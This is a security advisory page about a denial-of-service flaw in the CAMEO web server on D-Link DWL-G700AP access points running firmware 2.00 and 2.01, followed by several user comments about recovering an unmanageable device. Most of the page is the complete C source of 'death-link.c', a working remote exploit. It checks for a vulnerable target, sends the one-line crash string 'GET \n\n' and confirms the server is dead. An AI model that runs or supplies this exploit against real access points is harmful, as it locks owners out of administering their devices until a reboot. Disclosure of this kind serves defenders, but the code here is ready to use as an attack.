|
Brought to you by:
Suppliers of:
|
|
|
| |
"The DWL-G700AP is Wi-Fi IEEE 802.11g compliant, meaning that it can connect and interoperate with other 802.11g compatible wireless client devices. "
By crafting a special HTTP GET string, attackers can DoS the D-Link DWL-G700A and cause the HTTP server to crash. |
| |
Credit:
The information has been provided by l0om.
The original article can be found at: http://www.securityfocus.com/archive/1/425169/30/0/threaded
|
| |
Vulnerable Systems:
* D-Link DWL-G700AP firmware version 2.00
* D-Link DWL-G700AP firmware version 2.01
The DWL-G700AP is an access point from D-Link with a configuration interface using HTTP service which is managed from a HTTPD called "CAMEO".
This web server is very easy to DoS because all you have to do is send the AP the following string: "GET \n\n".
Exploit:
/*
death-link.c
------------------------
written by l0om
WWW.EXCLUDED.ORG
------------------------
exploit tested on firmware: v2.00 and the latest v2.01
remote DoS exploit for the CAMEO-httpd which is running on the D-Link
Accesspoint DWL-G700AP. After executing this the accesspoint cannot be
configured anymore because the only way to administrate the AP is the
administration with your browser. you have to reboot the box to get the
httpd started again.
have phun!
// some greetings
maximilian, Prof. J. Dealer, Theldens, Commander Jansen, ole, detach,
mattball, molke, murfie, vy99
excluded.org people, IT31 people
// the guys who made exploiting possible with buying this AP
joerres, hermanns, schubert
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DOSSTRING "GET \n\n"
#define TARGET "CAMEO-httpd"
#define DESTPORT 80
int alive(char *ip);
int check_httpd(char *ip);
void help(void);
void header(void);
int DoS(char *ip);
int main(int argc, char **argv)
{
int fd, i, check = 0;
char *ip = NULL;
header();
if(argc > 1)
for(i = 1; i < argc; i++)
if(argv[i][0] == '-')
switch(argv[i][1]) {
case 'o':
check = 2;
break;
case 'c':
check = 1;
break;
case 'h':
help();
break;
default:
printf("\t>> %s << unknown option\n",argv[i]);
exit(-1);
}
else ip = argv[i];
if(ip == NULL) help();
if(check) {
printf("\tchecking target... "); fflush(stdout);
i = check_httpd(ip);
if(i <= 0) {
printf("faild! ");
if(!i) printf("invalid target webserver\n");
else printf("webserver already dead?\n");
exit(-1);
}
else printf("done! valid victim detected\n");
if(check == 2) return 0;
}
printf("\tsending DoS... "); fflush(stdout);
if(DoS(ip) <= 0) {
printf("faild!\n");
return -1;
} else printf("done!\n");
sleep(1);
printf("\tchecking webserver status... "); fflush(stdout);
if(!alive(ip)) printf("%s DEAD\n",TARGET);
else printf("%s on %s is still alive :( \n",TARGET,ip);
return 0;
}
int check_httpd(char *ip)
{
int sockfd, nbytes, len, i = 0;
char buf[500], pattern[] = TARGET, *ptr;
struct sockaddr_in servaddr;
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(-1);
}
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(DESTPORT);
servaddr.sin_addr.s_addr = inet_addr(ip);
if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
return -1;
if(!write(sockfd, "GET / HTTP/1.0\n\n", 16))
return 0;
else nbytes = read(sockfd, buf, 500);
len = strlen(pattern);
ptr = buf;
while(nbytes--) {
if(*ptr == pattern[i])
i++;
else i = 0;
if(i == len) return 1;
else ptr++;
}
return 0;
}
int alive(char *ip)
{
int sockfd, nbytes, len, i = 0;
char buf[500], pattern[] = TARGET, *ptr;
struct sockaddr_in servaddr;
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(-1);
}
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(DESTPORT);
servaddr.sin_addr.s_addr = inet_addr(ip);
if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
return 0;
else return 1;
}
int DoS(char *ip)
{
int sockfd, nbytes, len, i = 0;
char buf[500], pattern[] = TARGET, *ptr;
struct sockaddr_in servaddr;
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(-1);
}
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(DESTPORT);
servaddr.sin_addr.s_addr = inet_addr(ip);
if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
return 0;
else return(write(sockfd, DOSSTRING, strlen(DOSSTRING)));
}
void help(void)
{
printf("\tdeath-link [options] <ip-address>\n");
printf("\t-o: ONLY CHECK for valid target\n");
printf("\t-c: check for valid target\n");
printf("\t-h: help\n");
exit(0);
}
void header(void)
{
printf("\tdeath-link - written by l0om\n");
printf("\t WWW.EXCLUDED.ORG\n");
printf("\tDoS %s D-Link DWL-G700AP\n\n",TARGET);
}
/* EoF */
|
| Subject:
|
HELP |
Date: |
31 Jul. 2006 |
| From: |
MEF |
DEAR FRIEND CAN YOU TELL ME HOW TO REFLASH SOFT IN THIS DEVICE?
FOR NOW I HAVE NO ACCESS TO dwl-g700AP I CAN PING IT BUT UNFORTUNATELY I TURNED DHCP ON ON IT
AFTER THAT I LOOSE POSIBILITY TO CONTROL AP
RESET DOESN'T WORK EVEN 1 MINUTE AND SO ON.....
PLEASE SEND ME MESSAGE WHAT I CAN DO NOW?
MY MAIL IS aakkoo@wp.pl
thx |
|
| Subject:
|
how to repair this problem if i have dead DoS CAMEO-httpd D-Link DWL-G700AP onehelp pls |
Date: |
3 Aug. 2006 |
| From: |
aakkoowp.pl |
| please help if you have a solution for ythis? write me email pls |
|
| Subject:
|
HELP |
Date: |
22 Nov. 2006 |
| From: |
kylenicola |
Mef,
just reset the ap using the reset button at the back of the unit |
|
|
|
|
|
|
